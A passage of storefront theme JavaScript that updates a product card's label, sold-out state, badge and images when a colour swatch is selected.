  if (variantLabel) variantLabel.textContent = swatchButton.dataset.cardVariantLabel || '';

  if (cardElement) {
    cardElement.classList.toggle('card--product-sold-out', !variantIsAvailable);
  }

  const badgeContainer = cardWrapper.querySelector('[data-card-badge]');
  if (badgeContainer) {
    const badgeType = swatchButton.dataset.cardVariantBadgeType || '';
    const badgeText = swatchButton.dataset.cardVariantBadgeText || '';
    const badgeScheme = swatchButton.dataset.cardVariantBadgeScheme || '';
    if (badgeType && badgeText) {
      badgeContainer.innerHTML = `<span class="badge color-${badgeScheme}">${badgeText}</span>`;
    } else {
      badgeContainer.innerHTML = '';
    }
  }

  if (!mediaSrc) return;

  const mediaImages = cardWrapper.querySelectorAll('.card__media .media img, .hf-pc-media__frame .media img');
  const primaryImage = mediaImages[0];
  if (!primaryImage) return;

  primaryImage.src = mediaSrc;
  if (mediaSrcset) primaryImage.srcset = mediaSrcset;
  primaryImage.alt = mediaAlt;

  const secondaryImage = cardWrapper.querySelector('.hf-pc-media__img--secondary');
  if (secondaryImage) {
    const secondarySrc = swatchButton.dataset.cardMediaSecondarySrc;
    if (secondarySrc) {
      secondaryImage.src = secondarySrc;
      secondaryImage.srcset = swatchButton.dataset.cardMediaSecondarySrcset || '';
      secondaryImage.style.display = '';
    } else {
      secondaryImage.style.display = 'none';
    }
  }
});